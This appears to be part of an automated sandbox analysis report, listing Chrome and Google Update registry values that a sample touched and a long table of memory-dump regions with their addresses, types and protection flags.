gfdkimpbcpahaombhbimeihdjnejgicl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
dr
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.reporting
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
module_blacklist_cache_md5_digest
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
media.storage_id_salt
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_account_id
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.account_id
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_seed
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_homepage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
default_search_provider_data.template_url_data
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
safebrowsing.incidents_sent
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
pinned_tabs
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
search_provider_overrides
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_default_search
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_username
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.startup_urls
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.restore_on_startup
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_version
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_startup_urls
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.prompt_wave
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage_is_newtabpage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
browser.show_home_button
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
|
user_experience_metrics.stability.exited_cleanly
|
||
|
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
lastrun
|
There are 37 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
232F7DB4000
|
heap
|
page read and write
|
|
|
|
232F7DC0000
|
heap
|
page read and write
|
|
|
|
1EC2CDC9000
|
heap
|
page read and write
|
||
|
1EEE85B1000
|
heap
|
page read and write
|
||
|
2490ADD0000
|
trusted library allocation
|
page read and write
|
||
|
1EEE8584000
|
heap
|
page read and write
|
||
|
1EEE8582000
|
heap
|
page read and write
|
||
|
A14707E000
|
stack
|
page read and write
|
||
|
1EEE7A29000
|
heap
|
page read and write
|
||
|
1EEE85A0000
|
heap
|
page read and write
|
||
|
212343B7000
|
heap
|
page read and write
|
||
|
232F7E66000
|
heap
|
page read and write
|
||
|
1EC2CF70000
|
trusted library allocation
|
page read and write
|
||
|
2490AE77000
|
heap
|
page read and write
|
||
|
1EEE8584000
|
heap
|
page read and write
|
||
|
232F7E5D000
|
heap
|
page read and write
|
||
|
27022C64000
|
heap
|
page read and write
|
||
|
1EEE79C0000
|
trusted library allocation
|
page read and write
|
||
|
1EEE7A7A000
|
heap
|
page read and write
|
||
|
27022C83000
|
heap
|
page read and write
|
||
|
1EEE7AEC000
|
heap
|
page read and write
|
||
|
1EEE8592000
|
heap
|
page read and write
|
||
|
1EC2CDD1000
|
heap
|
page read and write
|
||
|
27022C00000
|
heap
|
page read and write
|
||
|
1EEE8586000
|
heap
|
page read and write
|
||
|
1EEE8581000
|
heap
|
page read and write
|
||
|
2490AF13000
|
heap
|
page read and write
|
||
|
1EC2CE90000
|
trusted library allocation
|
page read and write
|
||
|
1EEE8587000
|
heap
|
page read and write
|
||
|
E2AD8FE000
|
stack
|
page read and write
|
||
|
2EBF7D02000
|
heap
|
page read and write
|
||
|
2EBF7C2A000
|
heap
|
page read and write
|
||
|
1EEE85AB000
|
heap
|
page read and write
|
||
|
2EBF7D13000
|
heap
|
page read and write
|
||
|
1EC2CFC0000
|
trusted library allocation
|
page read and write
|
||
|
212343C9000
|
heap
|
page read and write
|
||
|
232F7D70000
|
heap
|
page read and write
|
||
|
1EEE858F000
|
heap
|
page read and write
|
||
|
1EC2CDD1000
|
heap
|
page read and write
|
||
|
1EC2DAE0000
|
trusted library allocation
|
page read and write
|
||
|
1EEE85A1000
|
heap
|
page read and write
|
||
|
86BF4FE000
|
stack
|
page read and write
|
||
|
1EEE7A7A000
|
heap
|
page read and write
|
||
|
2EBF79E0000
|
heap
|
page read and write
|
||
|
2EBF7C59000
|
heap
|
page read and write
|
||
|
86BF18B000
|
stack
|
page read and write
|
||
|
1EEE858F000
|
heap
|
page read and write
|
||
|
86BF47D000
|
stack
|
page read and write
|
||
|
1EEE8584000
|
heap
|
page read and write
|
||
|
1EEE7AAA000
|
heap
|
page read and write
|
||
|
21234389000
|
heap
|
page read and write
|
||
|
1EEE7A13000
|
heap
|
page read and write
|
||
|
232F9930000
|
heap
|
page read and write
|
||
|
1EEE85A2000
|
heap
|
page read and write
|
||
|
1EEE7AEA000
|
heap
|
page read and write
|
||
|
F15CFFC000
|
stack
|
page read and write
|
||
|
2EBF7C00000
|
heap
|
page read and write
|
||
|
2490AF08000
|
heap
|
page read and write
|
||
|
232F7E97000
|
heap
|
page read and write
|
||
|
1EEE8587000
|
heap
|
page read and write
|
||
|
232F7EAB000
|
heap
|
page read and write
|
||
|
1EEE8581000
|
heap
|
page read and write
|
||
|
A14697C000
|
stack
|
page read and write
|
||
|
1EC2CF60000
|
trusted library allocation
|
page read and write
|
||
|
232F7E66000
|
heap
|
page read and write
|
||
|
212343AD000
|
heap
|
page read and write
|
||
|
1EEE85A9000
|
heap
|
page read and write
|
||
|
1EEE8A21000
|
heap
|
page read and write
|
||
|
2490AE5F000
|
heap
|
page read and write
|
||
|
27022D13000
|
heap
|
page read and write
|
||
|
1EC2CD20000
|
heap
|
page read and write
|
||
|
2EBF7C2F000
|
heap
|
page read and write
|
||
|
1EEE85B1000
|
heap
|
page read and write
|
||
|
A1472F8000
|
stack
|
page read and write
|
||
|
1EEE82F0000
|
remote allocation
|
page read and write
|
||
|
232F7E69000
|
heap
|
page read and write
|
||
|
232FB3D0000
|
heap
|
page read and write
|
||
|
1EEE7B13000
|
heap
|
page read and write
|
||
|
1EC2CFF0000
|
trusted library allocation
|
page read and write
|
||
|
1EEE7AB3000
|
heap
|
page read and write
|
||
|
212343AB000
|
heap
|
page read and write
|
||
|
1EC2CFE0000
|
heap
|
page read and write
|
||
|
86BF77E000
|
stack
|
page read and write
|
||
|
27022C51000
|
heap
|
page read and write
|
||
|
1EEE8589000
|
heap
|
page read and write
|
||
|
73D9A7F000
|
stack
|
page read and write
|
||
|
73D9CFC000
|
stack
|
page read and write
|
||
|
2490AE00000
|
heap
|
page read and write
|
||
|
86BF5FB000
|
stack
|
page read and write
|
||
|
1EEE859A000
|
heap
|
page read and write
|
||
|
27022D08000
|
heap
|
page read and write
|
||
|
1EEE8589000
|
heap
|
page read and write
|
||
|
9324777000
|
stack
|
page read and write
|
||
|
1EEE859A000
|
heap
|
page read and write
|
||
|
2EBF7C5A000
|
heap
|
page read and write
|
||
|
E2AD77E000
|
stack
|
page read and write
|
||
|
1EEE7A65000
|
heap
|
page read and write
|
||
|
1EEE8A02000
|
heap
|
page read and write
|
||
|
1EEE858F000
|
heap
|
page read and write
|
||
|
1EEE7A6C000
|
heap
|
page read and write
|
||
|
232F7E81000
|
heap
|
page read and write
|
||
|
232F7DB0000
|
heap
|
page read and write
|
||
|
1EC2CDC0000
|
heap
|
page read and write
|
||
|
1EEE7AC5000
|
heap
|
page read and write
|
||
|
932467B000
|
stack
|
page read and write
|
||
|
2123439F000
|
heap
|
page read and write
|
||
|
1EC2CBD0000
|
trusted library allocation
|
page read and write
|
||
|
2EBF7D08000
|
heap
|
page read and write
|
||
|
2EBF7B40000
|
trusted library allocation
|
page read and write
|
||
|
1EEE7A69000
|
heap
|
page read and write
|
||
|
1EEE8A02000
|
heap
|
page read and write
|
||
|
1EEE7A27000
|
heap
|
page read and write
|
||
|
1EEE85CC000
|
heap
|
page read and write
|
||
|
2EBF7C3C000
|
heap
|
page read and write
|
||
|
2A13EFE000
|
stack
|
page read and write
|
||
|
1EC2CDD1000
|
heap
|
page read and write
|
||
|
232F7E04000
|
heap
|
page read and write
|
||
|
232F7DC9000
|
heap
|
page read and write
|
||
|
232FB3F4000
|
heap
|
page read and write
|
||
|
2123438E000
|
heap
|
page read and write
|
||
|
F15D1F7000
|
stack
|
page read and write
|
||
|
1EEE8A02000
|
heap
|
page read and write
|
||
|
232F7CF0000
|
heap
|
page read and write
|
||
|
1EEE857A000
|
heap
|
page read and write
|
||
|
1EEE858D000
|
heap
|
page read and write
|
||
|
2EBF7C9A000
|
heap
|
page read and write
|
||
|
1EC2CF00000
|
trusted library allocation
|
page read and write
|
||
|
1EC2CD00000
|
heap
|
page read and write
|
||
|
232F7E71000
|
heap
|
page read and write
|
||
|
1EC2CFE9000
|
heap
|
page read and write
|
||
|
212343C4000
|
heap
|
page read and write
|
||
|
932457C000
|
stack
|
page read and write
|
||
|
1EEE859A000
|
heap
|
page read and write
|
||
|
232FCB60000
|
trusted library allocation
|
page read and write
|
||
|
1EEE7AE1000
|
heap
|
page read and write
|
||
|
1EC2CBC0000
|
heap
|
page read and write
|
||
|
1EEE85AB000
|
heap
|
page read and write
|
||
|
1EEE7A81000
|
heap
|
page read and write
|
||
|
1EEE7A6B000
|
heap
|
page read and write
|
||
|
A146E78000
|
stack
|
page read and write
|
||
|
1EC2CD80000
|
heap
|
page read and write
|
||
|
1EEE857C000
|
heap
|
page read and write
|
||
|
232F7E98000
|
heap
|
page read and write
|
||
|
2490AC70000
|
heap
|
page read and write
|
||
|
27022C2D000
|
heap
|
page read and write
|
||
|
A146C7E000
|
stack
|
page read and write
|
||
|
F15CE7E000
|
stack
|
page read and write
|
||
|
27022D00000
|
heap
|
page read and write
|
||
|
F15CBCC000
|
stack
|
page read and write
|
||
|
2490AE5A000
|
heap
|
page read and write
|
||
|
1EEE8A02000
|
heap
|
page read and write
|
||
|
1EEE7A5C000
|
heap
|
page read and write
|
||
|
2490AE60000
|
heap
|
page read and write
|
||
|
F15D3FE000
|
stack
|
page read and write
|
||
|
A1469FF000
|
stack
|
page read and write
|
||
|
27022C2A000
|
heap
|
page read and write
|
||
|
2EBF7A40000
|
heap
|
page read and write
|
||
|
232F7CD0000
|
heap
|
page read and write
|
||
|
1EEE8581000
|
heap
|
page read and write
|
||
|
2490AE29000
|
heap
|
page read and write
|
||
|
1EEE85A0000
|
heap
|
page read and write
|
||
|
212342D0000
|
heap
|
page read and write
|
||
|
1EC2CEA0000
|
trusted library allocation
|
page read and write
|
||
|
73D9C7E000
|
stack
|
page read and write
|
||
|
2490AF00000
|
heap
|
page read and write
|
||
|
1EEE8589000
|
heap
|
page read and write
|
||
|
232F97B0000
|
heap
|
page read and write
|
||
|
1EEE8A02000
|
heap
|
page read and write
|
||
|
2EBF8402000
|
trusted library allocation
|
page read and write
|
||
|
1EEE8574000
|
heap
|
page read and write
|
||
|
1EEE8522000
|
heap
|
page read and write
|
||
|
1EEE8550000
|
heap
|
page read and write
|
||
|
2490AE5C000
|
heap
|
page read and write
|
||
|
2A13F79000
|
stack
|
page read and write
|
||
|
1EEE7A61000
|
heap
|
page read and write
|
||
|
1EEE8597000
|
heap
|
page read and write
|
||
|
232F7E61000
|
heap
|
page read and write
|
||
|
1EEE8561000
|
heap
|
page read and write
|
||
|
232F7E7C000
|
heap
|
page read and write
|
||
|
212343CD000
|
heap
|
page read and write
|
||
|
1EEE7A64000
|
heap
|
page read and write
|
||
|
2490ACD0000
|
heap
|
page read and write
|
||
|
1EEE85A8000
|
heap
|
page read and write
|
||
|
1EEE857A000
|
heap
|
page read and write
|
||
|
1EEE7A60000
|
heap
|
page read and write
|
||
|
F15D0FB000
|
stack
|
page read and write
|
||
|
232F7E14000
|
heap
|
page read and write
|
||
|
1EEE8A21000
|
heap
|
page read and write
|
||
|
1EEE8A1A000
|
heap
|
page read and write
|
||
|
212343C4000
|
heap
|
page read and write
|
||
|
232F9C80000
|
heap
|
page read and write
|
||
|
232F7E85000
|
heap
|
page read and write
|
||
|
1EEE8587000
|
heap
|
page read and write
|
||
|
E2AD309000
|
stack
|
page read and write
|
||
|
1EEE7930000
|
heap
|
page read and write
|
||
|
1EEE7990000
|
heap
|
page read and write
|
||
|
F15CEFE000
|
stack
|
page read and write
|
||
|
1EC2CF40000
|
trusted library allocation
|
page read and write
|
||
|
1EEE8592000
|
heap
|
page read and write
|
||
|
2EBF7D00000
|
heap
|
page read and write
|
||
|
93241CE000
|
stack
|
page read and write
|
||
|
86BFA7E000
|
stack
|
page read and write
|
||
|
1EEE857A000
|
heap
|
page read and write
|
||
|
932447E000
|
stack
|
page read and write
|
||
|
27022A80000
|
heap
|
page read and write
|
||
|
1EEE8589000
|
heap
|
page read and write
|
||
|
1EEE85A1000
|
heap
|
page read and write
|
||
|
1EEE7A5D000
|
heap
|
page read and write
|
||
|
1EC2CF50000
|
heap
|
page readonly
|
||
|
27022A70000
|
heap
|
page read and write
|
||
|
232F7E69000
|
heap
|
page read and write
|
||
|
1EEE8589000
|
heap
|
page read and write
|
||
|
1EEE8A3E000
|
heap
|
page read and write
|
||
|
21234685000
|
heap
|
page read and write
|
||
|
1EEE7A6D000
|
heap
|
page read and write
|
||
|
1EEE85D5000
|
heap
|
page read and write
|
||
|
1EEE7A3C000
|
heap
|
page read and write
|
||
|
1EEE7A5E000
|
heap
|
page read and write
|
||
|
73D9BF8000
|
stack
|
page read and write
|
||
|
1EEE859E000
|
heap
|
page read and write
|
||
|
2490AC60000
|
heap
|
page read and write
|
||
|
27022D26000
|
heap
|
page read and write
|
||
|
1EEE7A67000
|
heap
|
page read and write
|
||
|
1EC2CFE5000
|
heap
|
page read and write
|
||
|
2123439A000
|
heap
|
page read and write
|
||
|
232F7E10000
|
heap
|
page read and write
|
||
|
212343B7000
|
heap
|
page read and write
|
||
|
1EEE8586000
|
heap
|
page read and write
|
||
|
27022C3C000
|
heap
|
page read and write
|
||
|
232F7E6A000
|
heap
|
page read and write
|
||
|
1EEE859C000
|
heap
|
page read and write
|
||
|
2490AE5E000
|
heap
|
page read and write
|
||
|
1EEE7920000
|
heap
|
page read and write
|
||
|
1EEE7A73000
|
heap
|
page read and write
|
||
|
E2AD7FE000
|
stack
|
page read and write
|
||
|
E2AD97E000
|
stack
|
page read and write
|
||
|
232F7DBE000
|
heap
|
page read and write
|
||
|
2490AF02000
|
heap
|
page read and write
|
||
|
1EEE8587000
|
heap
|
page read and write
|
||
|
1EEE7A0B000
|
heap
|
page read and write
|
||
|
932414B000
|
stack
|
page read and write
|
||
|
E2AD87E000
|
stack
|
page read and write
|
||
|
A1471FF000
|
unkown
|
page read and write
|
||
|
2EBF7C61000
|
heap
|
page read and write
|
||
|
212343CC000
|
heap
|
page read and write
|
||
|
2490AE13000
|
heap
|
page read and write
|
||
|
1EEE7B02000
|
heap
|
page read and write
|
||
|
27022C13000
|
heap
|
page read and write
|
||
|
2490AE81000
|
heap
|
page read and write
|
||
|
1EEE858F000
|
heap
|
page read and write
|
||
|
73D9B7F000
|
stack
|
page read and write
|
||
|
2A13E79000
|
stack
|
page read and write
|
||
|
1EEE7AD4000
|
heap
|
page read and write
|
||
|
1EEE85B1000
|
heap
|
page read and write
|
||
|
1EEE85BC000
|
heap
|
page read and write
|
||
|
1EEE82F0000
|
remote allocation
|
page read and write
|
||
|
A146F77000
|
stack
|
page read and write
|
||
|
1EEE7A00000
|
heap
|
page read and write
|
||
|
1EEE7B08000
|
heap
|
page read and write
|
||
|
21234680000
|
heap
|
page read and write
|
||
|
232F97B4000
|
heap
|
page read and write
|
||
|
1EEE8A02000
|
heap
|
page read and write
|
||
|
212343C7000
|
heap
|
page read and write
|
||
|
212343B0000
|
heap
|
page read and write
|
||
|
1EEE858B000
|
heap
|
page read and write
|
||
|
1EEE858D000
|
heap
|
page read and write
|
||
|
1EEE7B16000
|
heap
|
page read and write
|
||
|
27022C5E000
|
heap
|
page read and write
|
||
|
1EEE85BD000
|
heap
|
page read and write
|
||
|
1EEE7ABE000
|
heap
|
page read and write
|
||
|
A147177000
|
stack
|
page read and write
|
||
|
1EEE85A9000
|
heap
|
page read and write
|
||
|
2123439F000
|
heap
|
page read and write
|
||
|
2A13C7B000
|
stack
|
page read and write
|
||
|
27023402000
|
trusted library allocation
|
page read and write
|
||
|
73D9AFF000
|
stack
|
page read and write
|
||
|
1EEE8570000
|
heap
|
page read and write
|
||
|
1EEE85B6000
|
heap
|
page read and write
|
||
|
1EEE85AC000
|
heap
|
page read and write
|
||
|
1EEE7AE7000
|
heap
|
page read and write
|
||
|
232F7EAB000
|
heap
|
page read and write
|
||
|
1EEE8A00000
|
heap
|
page read and write
|
||
|
1EEE858C000
|
heap
|
page read and write
|
||
|
2EBF7C13000
|
heap
|
page read and write
|
||
|
232FB3F4000
|
heap
|
page read and write
|
||
|
86BF877000
|
stack
|
page read and write
|
||
|
1EEE858F000
|
heap
|
page read and write
|
||
|
1EEE85AB000
|
heap
|
page read and write
|
||
|
232FB3D1000
|
heap
|
page read and write
|
||
|
1EEE7A74000
|
heap
|
page read and write
|
||
|
2EBF7C7F000
|
heap
|
page read and write
|
||
|
2EBF79D0000
|
heap
|
page read and write
|
||
|
2490B602000
|
trusted library allocation
|
page read and write
|
||
|
F15D2FE000
|
stack
|
page read and write
|
||
|
A146D7B000
|
stack
|
page read and write
|
||
|
1EEE8587000
|
heap
|
page read and write
|
||
|
27022AE0000
|
heap
|
page read and write
|
||
|
1EEE7AA9000
|
heap
|
page read and write
|
||
|
1EEE82F0000
|
remote allocation
|
page read and write
|
||
|
212343AF000
|
heap
|
page read and write
|
||
|
1EEE8584000
|
heap
|
page read and write
|
||
|
932487F000
|
stack
|
page read and write
|
||
|
2490AE55000
|
heap
|
page read and write
|
||
|
2490AE5B000
|
heap
|
page read and write
|
||
|
1EEE8519000
|
heap
|
page read and write
|
||
|
212343C4000
|
heap
|
page read and write
|
||
|
1EEE85AF000
|
heap
|
page read and write
|
||
|
1EEE8589000
|
heap
|
page read and write
|
||
|
86BF97E000
|
stack
|
page read and write
|
||
|
1EEE8589000
|
heap
|
page read and write
|
||
|
86BF6FB000
|
stack
|
page read and write
|
||
|
2EBF7C67000
|
heap
|
page read and write
|
||
|
1EEE8586000
|
heap
|
page read and write
|
||
|
1EEE858B000
|
heap
|
page read and write
|
||
|
1EC2CDCA000
|
heap
|
page read and write
|
||
|
27022C78000
|
heap
|
page read and write
|
||
|
1EEE8500000
|
heap
|
page read and write
|
||
|
73D97CA000
|
stack
|
page read and write
|
||
|
2A13DFE000
|
stack
|
page read and write
|
||
|
1EEE8589000
|
heap
|
page read and write
|
||
|
21234330000
|
heap
|
page read and write
|
||
|
27022D02000
|
heap
|
page read and write
|
||
|
932497D000
|
stack
|
page read and write
|
||
|
27022BE0000
|
trusted library allocation
|
page read and write
|
||
|
2490AE3C000
|
heap
|
page read and write
|
||
|
21234350000
|
heap
|
page read and write
|
||
|
1EEE8402000
|
heap
|
page read and write
|
||
|
21234380000
|
heap
|
page read and write
|
||
|
212343B7000
|
heap
|
page read and write
|
||
|
1EEE8581000
|
heap
|
page read and write
|
||
|
1EEE7AFA000
|
heap
|
page read and write
|
||
|
2490AE62000
|
heap
|
page read and write
|
||
|
1EEE8A02000
|
heap
|
page read and write
|
||
|
232F7B90000
|
heap
|
page read and write
|
There are 324 hidden memdumps, click here to show them.